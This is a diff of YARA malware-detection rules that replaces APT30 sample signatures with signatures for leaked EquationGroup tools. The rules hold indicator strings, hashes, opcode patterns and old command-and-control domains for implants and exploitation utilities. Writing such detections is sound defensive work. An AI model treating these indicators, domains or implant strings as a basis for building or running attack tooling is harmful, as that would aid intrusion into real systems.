-		hash3 = "b7b282c9e3eca888cbdb5a856e07e8bd"
-		hash4 = "df1799845b51300b03072c6569ab96d5"
+		hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1"
 
 	strings:
-		$s0 = "\\~zlzl.exe" ascii
-		$s2 = "\\Internet Exp1orer" ascii
-		$s3 = "NodAndKabIsExcellent" fullword ascii
+		$x1 = "~debl00l.tmp" fullword ascii
+		$x2 = "\\\\.\\mailslot\\c54321" fullword ascii
+		$x3 = "\\\\.\\mailslot\\c12345" fullword ascii
+		$x4 = "nowMutex" fullword ascii
+		$s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" fullword ascii
+		$s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii
+		$s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_APT30_Sample_23 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Xxxridearea : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9366dd34-9967-5b40-935e-4b0d8f2f5e9e"
-		date = "2015-04-13"
+		id = "2475778b-1246-5471-b305-a946c253c50c"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L617-L637"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2809-L2825"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9865e24aadb4480bd3c182e50e0e53316546fc01"
-		logic_hash = "64ff048b061431e0834ac40bfccb0d9e8ca60ffb022578ef910e6ffc511be6ed"
+		logic_hash = "4d2eeabbb3bb27f46232fe0a43f0ecda9f3589dbe6b08fd4f8aac14f6d12090b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6"
 
 	strings:
-		$s0 = "hostid" ascii
-		$s1 = "\\Window" ascii
-		$s2 = "%u:%u%s" fullword ascii
-		$s5 = "S2tware\\Mic" ascii
-		$s6 = "la/4.0 (compa" ascii
-		$s7 = "NameACKernel" fullword ascii
-		$s12 = "ToWideChc[lo" fullword ascii
-		$s14 = "help32SnapshotfL" ascii
+		$x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" fullword ascii
+		$x2 = "The output payload \"%s\" has a size of %d-bytes." fullword ascii
+		$x3 = "ERROR: fwrite(%s) failed on ucPayload" fullword ascii
+		$x4 = "Load and execute implant within the existing thread" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_24 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Yak_Min_Install : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aed2201d-b557-56ec-aa53-fff5b1e17dbd"
-		date = "2015-04-13"
+		id = "dc648deb-4220-5ec3-b95f-ff6cc463f79b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L639-L658"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2827-L2842"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "572caa09f2b600daa941c60db1fc410bef8d1771"
-		logic_hash = "9d550fd0225f1c4e3b16ae53648644d7bb5c80e99e2a1a3d199e51c7219c2e94"
+		logic_hash = "f224c87c5626fee98dae5b4bbab2b4468bdd126ac63371ede53545d7cb177123"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e"
 
 	strings:
-		$s1 = "dizhi.gif" fullword ascii
-		$s3 = "Mozilla/4.0" fullword ascii
-		$s4 = "lyeagles" fullword ascii
-		$s6 = "HHOSTR" ascii
-		$s7 = "#MicrosoftHaveAck7" ascii
-		$s8 = "iexplore." fullword ascii
-		$s17 = "ModuleH" fullword ascii
+		$s1 = "driver start" fullword ascii
+		$s2 = "DeviceIoControl Error: %d" fullword ascii
+		$s3 = "Phlook" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_25 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setouraddr : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b2f2ba2-e9cc-5b3c-8af9-4217d662bc3f"
-		date = "2015-04-13"
+		id = "a2dbfa7b-3fb6-56cf-9391-1a3abb08e3cb"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L660-L679"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2844-L2858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "44a21c8b3147fabc668fee968b62783aa9d90351"
-		logic_hash = "86945188f888762ae585463df7cfb6e5fed30d0fcfcca4e642aedf07a0193ae7"
+		logic_hash = "d49bcef48afeb63b763c88443930f28be1d6f9f27d5f0bd9161d151fa3081868"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504"
 
 	strings:
-		$s1 = "C:\\WINDOWS" fullword ascii
-		$s2 = "aragua" fullword ascii
-		$s4 = "\\driver32\\7$" ascii
-		$s8 = "System V" fullword ascii
-		$s9 = "Compu~r" fullword ascii
-		$s10 = "PROGRAM L" fullword ascii
-		$s18 = "GPRTMAX" fullword ascii
+		$s1 = "USAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]" fullword ascii
+		$s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_26 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Getadmin_LSADUMP_Modifyprivilege_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa80a142-c8fc-504e-b475-e9838607bec6"
-		date = "2015-04-13"
+		id = "b3fda153-563c-5a5c-9f5c-12d6ef8b3d95"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L681-L700"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2860-L2882"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e26588113417bf68cb0c479638c9cd99a48e846d"
-		logic_hash = "b585687c071dc2dddb888906f47b7af6bc7683e902d3afb42364896e800fac5c"
+		logic_hash = "ee5c818c29ccb1b280669f7f5e828963c4523b73b68674d8c0aae72189f0208c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c8b354793ad5a16744cf1d4efdc5fe48d5a0cf0657974eb7145e0088fcf609ff"
+		hash2 = "5f06ec411f127f23add9f897dc165eaa68cbe8bb99da8f00a4a360f108bb8741"
 
 	strings:
-		$s1 = "forcegue" fullword ascii
-		$s3 = "Windows\\Cur" fullword ascii
-		$s4 = "System Id" fullword ascii
-		$s5 = "Software\\Mic" fullword ascii
-		$s6 = "utiBy0ToWideCh&$a" fullword ascii
-		$s10 = "ModuleH" fullword ascii
-		$s15 = "PeekNamed6G" fullword ascii
+		$s1 = "\\system32\\win32k.sys" wide
+		$s2 = "hKeAddSystemServiceTable" fullword ascii
+		$s3 = "hPsDereferencePrimaryToken" fullword ascii
+		$s4 = "CcnFormSyncExFBC" fullword wide
+		$s5 = "hPsDereferencePrimaryToken" fullword ascii
+		$op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b }
+		$op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 }
+		$op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( 4 of ( $s* ) or all of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_APT30_Generic_D : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Sendpktrigger : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b8d8a60-a357-5cfd-8ff1-6264144ad7be"
-		date = "2015-04-13"
+		id = "6cbf95eb-323c-53a3-9aca-222626add4dc"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L702-L725"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2884-L2897"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ff39fc7643441652ec0cdf2f84c7827d326ddb5f01451b3857cfc4015eb01467"
+		logic_hash = "277367e69406a84ff4ff6b57d05bf97468b0083e23f9c5cd14cdd26cad5846d7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "35dfb55f419f476a54241f46e624a1a4"
-		hash2 = "4fffcbdd4804f6952e0daf2d67507946"
-		hash3 = "597805832d45d522c4882f21db800ecf"
-		hash4 = "6bd422d56e85024e67cc12207e330984"
-		hash5 = "82e13f3031130bd9d567c46a9c71ef2b"
-		hash6 = "b79d87ff6de654130da95c73f66c15fa"
+		hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
 
 	strings:
-		$s0 = "Windows Security Service Feedback" fullword wide
-		$s1 = "wssfmgr.exe" fullword wide
-		$s2 = "\\rb.htm" ascii
-		$s3 = "rb.htm" fullword ascii
-		$s4 = "cook5" ascii
-		$s5 = "5, 4, 2600, 0" fullword wide
+		$x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_27 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dmgz_Target_2 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "22815745-086f-59ee-aac1-f35e49aa5835"
-		date = "2015-04-13"
+		id = "426e982c-2380-5801-ba80-ab25ec4c0f74"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L727-L746"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2899-L2916"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "959573261ca1d7e5ddcd19447475b2139ca24fe1"
-		logic_hash = "5ef0661c5c04f0f0923548509363971011194a16e4308fcfdea5db90e85518a4"
+		logic_hash = "ab9ab949ee17655e424f6a65d3605e9900d214d1c620e051104762d5c214419f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904"
 
 	strings:
-		$s0 = "Mozilla/4.0" fullword ascii
-		$s1 = "dizhi.gif" fullword ascii
-		$s5 = "oftHaveAck+" ascii
-		$s10 = "HlobalAl" fullword ascii
-		$s13 = "$NtRND1$" fullword ascii
-		$s14 = "_NStartup" ascii
-		$s16 = "GXSYSTEM" fullword ascii
+		$s1 = "\\\\.\\%ls" fullword ascii
+		$op0 = { e8 ce 34 00 00 b8 02 00 00 f0 e9 26 02 00 00 48 }
+		$op1 = { 8b 4d 28 e8 02 05 00 00 89 45 34 eb 07 c7 45 34 }
+		$op2 = { e8 c2 34 00 00 90 48 8d 8c 24 00 01 00 00 e8 a4 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_28 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mstcp32_DXGHLP16_Tdip : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1bc8c68f-ebbb-58b1-92aa-5954318096a0"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L748-L776"
+		id = "5b54e68b-7bf3-59a0-8257-c370a3b9e4db"
+		date = "2017-04-15"
+		modified = "2023-01-06"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2918-L2938"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d246a188ad9ec69948bef6018bab1e7a244c76dcf511c3f9d16024ef7e369ae2"
+		logic_hash = "35fab86ca4cb287c8046a1764a91523673e12b5729d87c90b0c298dcbfcf86eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e62a63307deead5c9fcca6b9a2d51fb0"
-		hash2 = "5b590798da581c894d8a87964763aa8b"
+		hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
+		hash2 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
+		hash3 = "a5ec4d102d802ada7c5083af53fd9d3c9b5aa83be9de58dbb4fac7876faf6d29"
 
 	strings:
-		$s0 = "www.flyeagles.com" fullword ascii
-		$s1 = "iexplore.exe" fullword ascii
-		$s2 = "www.km-nyc.com" fullword ascii
-		$s3 = "cmdLine.exe" fullword ascii
-		$s4 = "Software\\Microsoft\\CurrentNetInf" fullword ascii
-		$s5 = "/dizhi.gif" ascii
-		$s6 = "/connect.gif" ascii
-		$s7 = "USBTest.sys" fullword ascii
-		$s8 = "/ver.htm" fullword ascii
-		$s11 = "\\netscv.exe" ascii
-		$s12 = "/app.htm" fullword ascii
-		$s13 = "\\netsvc.exe" ascii
-		$s14 = "/exe.htm" fullword ascii
-		$s18 = "MicrosoftHaveAck" fullword ascii
-		$s19 = "MicrosoftHaveExit" fullword ascii
+		$s1 = "\\Registry\\User\\CurrentUser\\" wide
+		$s2 = "\\DosDevices\\%ws" wide
+		$s3 = "\\Device\\%ws_%ws" wide
+		$s4 = "sys\\mstcp32.dbg" fullword ascii
+		$s5 = "%ws%03d%ws%wZ" fullword wide
+		$s6 = "TCP/IP driver" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and 7 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_29 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Regprobe : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24334885-fcb4-5a13-82e8-c8465f97361e"
-		date = "2015-04-13"
+		id = "184618b7-a24c-5a8c-9fb2-a5a07f1a0299"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L778-L798"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2940-L2955"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "44492c53715d7c79895904543843a321491cb23a"
-		logic_hash = "7a59118ba00413961e6fc4d54680373d033a38d698613f853f67137b85c123a7"
+		logic_hash = "01e7387c26ae3736c8fac1a3bb6ff283f8b06949af7a4ac36a556b292412bda2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de"
 
 	strings:
-		$s0 = "LSSAS.exe" fullword ascii
-		$s1 = "Software\\Microsoft\\FlashDiskInf" fullword ascii
-		$s2 = ".petite" fullword ascii
-		$s3 = "MicrosoftFlashExit" fullword ascii
-		$s4 = "MicrosoftFlashHaveExit" fullword ascii
-		$s5 = "MicrosoftFlashHaveAck" fullword ascii
-		$s6 = "\\driver32" ascii
-		$s7 = "MicrosoftFlashZJ" fullword ascii
+		$x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" fullword ascii
+		$x2 = "key does not exist or pinging w2k system" fullword ascii
+		$x3 = "RpcProxy=255.255.255.255:65536" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_30 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Doublefeaturedll_Dll_2 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "787b288a-6fb4-5483-af76-933651ec6d58"
-		date = "2015-04-13"
+		id = "f77fd49f-815b-5fb9-a3d7-8721edf79b28"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L800-L817"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2957-L2974"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3b684fa40b4f096e99fbf535962c7da5cf0b4528"
-		logic_hash = "5ecfc8d53b768f624c8765f70708bfaae5396d7aa6b0335f7c656f4350649c5d"
+		logic_hash = "0d6751ebfb2541c86b74583b7867de0a193ca106bf77337c8b10f15cdeb596bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af"
+		hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985"
+		hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e"
 
 	strings:
-		$s0 = "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)" fullword wide
-		$s3 = "RnhwtxtkyLRRMf{jJ}ny" fullword ascii
-		$s4 = "RnhwtxtkyLRRJ}ny" fullword ascii
-		$s5 = "ZRLDownloadToFileA" fullword ascii
-		$s9 = "5.1.2600.2180" fullword wide
+		$s1 = ".dllfD" fullword ascii
+		$s2 = "Khsppxu" fullword ascii
+		$s3 = "D$8.exe" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_31 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gangsterthief_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9333870b-7eaa-54dd-a801-7292708fb592"
-		date = "2015-04-13"
+		id = "9127f280-135e-5f83-9587-eab3ad84ad69"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L819-L836"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2976-L2993"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8b4271167655787be1988574446125eae5043aca"
-		logic_hash = "003bfa9774d3e85829cc266d06417b86287986994995adfa7a2bd26c3648c07e"
+		logic_hash = "c8145d6eedf20cf95baf329a6240b5b740273ff0a7f82edd3c346eb8c67e69e1"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "50b269bda5fedcf5a62ee0514c4b14d48d53dd18ac3075dcc80b52d0c2783e06"
 
 	strings:
-		$s0 = "\\ZJRsv.tem" ascii
-		$s1 = "forceguest" fullword ascii
-		$s4 = "\\$NtUninstallKB570317$" ascii
-		$s8 = "[Can'tGetIP]" fullword ascii
-		$s14 = "QWERTY:,`/" fullword ascii
+		$s1 = "\\\\.\\%s:" fullword wide
+		$s4 = "raw_open CreateFile error" fullword ascii
+		$s5 = "-PATHDELETED-" ascii
+		$s6 = "(deleted)" fullword wide
+		$s8 = "NULLFILENAME" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_J : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setcallbackports : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "64a5106e-d7f3-5c68-a14e-410149a1bb9e"
-		date = "2015-04-13"
+		id = "3c06fc74-2e75-5348-bb62-30c724de1414"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L838-L869"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2995-L3009"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7c404689b60fe493ca9b503902173ac04d7bb00488edec9e69006e6d51e20c51"
+		logic_hash = "e087534589228ac1af8b8b8d2ebbc1bc99fc25b38cb4c4d840cab8e90e75644a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49aca228674651cba776be727bdb7e60"
-		hash2 = "5c7a6b3d1b85fad17333e02608844703"
-		hash3 = "649fa64127fef1305ba141dd58fb83a5"
-		hash4 = "9982fd829c0048c8f89620691316763a"
-		hash5 = "baff5262ae01a9217b10fcd5dad9d1d5"
-		hash6 = "9982fd829c0048c8f89620691316763a"
+		hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0"
 
 	strings:
-		$s0 = "Launcher.EXE" fullword wide
-		$s1 = "Symantec Security Technologies" fullword wide
-		$s2 = "\\Symantec LiveUpdate.lnk" ascii
-		$s3 = "Symantec Service Framework" fullword wide
-		$s4 = "\\ccSvcHst.exe" ascii
-		$s5 = "\\wssfmgr.exe" ascii
-		$s6 = "Symantec Corporation" fullword wide
-		$s7 = "\\5.1.0.29" ascii
-		$s8 = "\\Engine" ascii
-		$s9 = "Copyright (C) 2000-2010 Symantec Corporation. All rights reserved." fullword wide
-		$s10 = "Symantec LiveUpdate" fullword ascii
-		$s11 = "\\Norton360" ascii
-		$s15 = "BinRes" fullword ascii
-		$s16 = "\\readme.lz" ascii
+		$s1 = "USAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]" fullword ascii
+		$s2 = "You may enter between 1 and 6 ports to change the defaults." fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Microfost : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_BH_2000 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "19231001-1da3-5be6-8275-03c9fc7c6377"
-		date = "2015-04-13"
+		id = "b02fa407-e6f1-5c2d-a587-7edb55dbe0a5"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
